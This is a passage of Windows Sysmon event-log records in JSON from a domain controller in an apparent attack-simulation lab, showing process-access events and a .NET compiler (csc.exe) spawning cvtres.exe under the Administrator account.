\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.930\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010A3F00700}\r\nProcessId: 4068\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESAB6A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\CSC46EC1E518F894E75885959747A116E5E.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.930","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010A3F00700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESAB6A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\CSC46EC1E518F894E75885959747A116E5E.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline\"","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nSourceProcessId: 3064\r\nSourceThreadId: 1192\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","SourceProcessId":"3064","SourceThreadId":"1192","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
